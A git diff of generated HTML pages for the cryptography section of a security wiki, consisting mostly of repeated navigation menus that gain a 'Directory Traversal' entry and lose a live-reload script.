      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -215,22 +215,6 @@

Security

- - diff --git "a/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" "b/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" index f30dfde8..0443f5a9 100644 --- "a/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" +++ "b/docs/Cryptography/Hash Functions/Merkle-Damg\303\245rd Transform.html" @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -226,22 +226,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Hash Functions/Security Definitions.html b/docs/Cryptography/Hash Functions/Security Definitions.html index 24ed8135..b8262c23 100644 --- a/docs/Cryptography/Hash Functions/Security Definitions.html +++ b/docs/Cryptography/Hash Functions/Security Definitions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
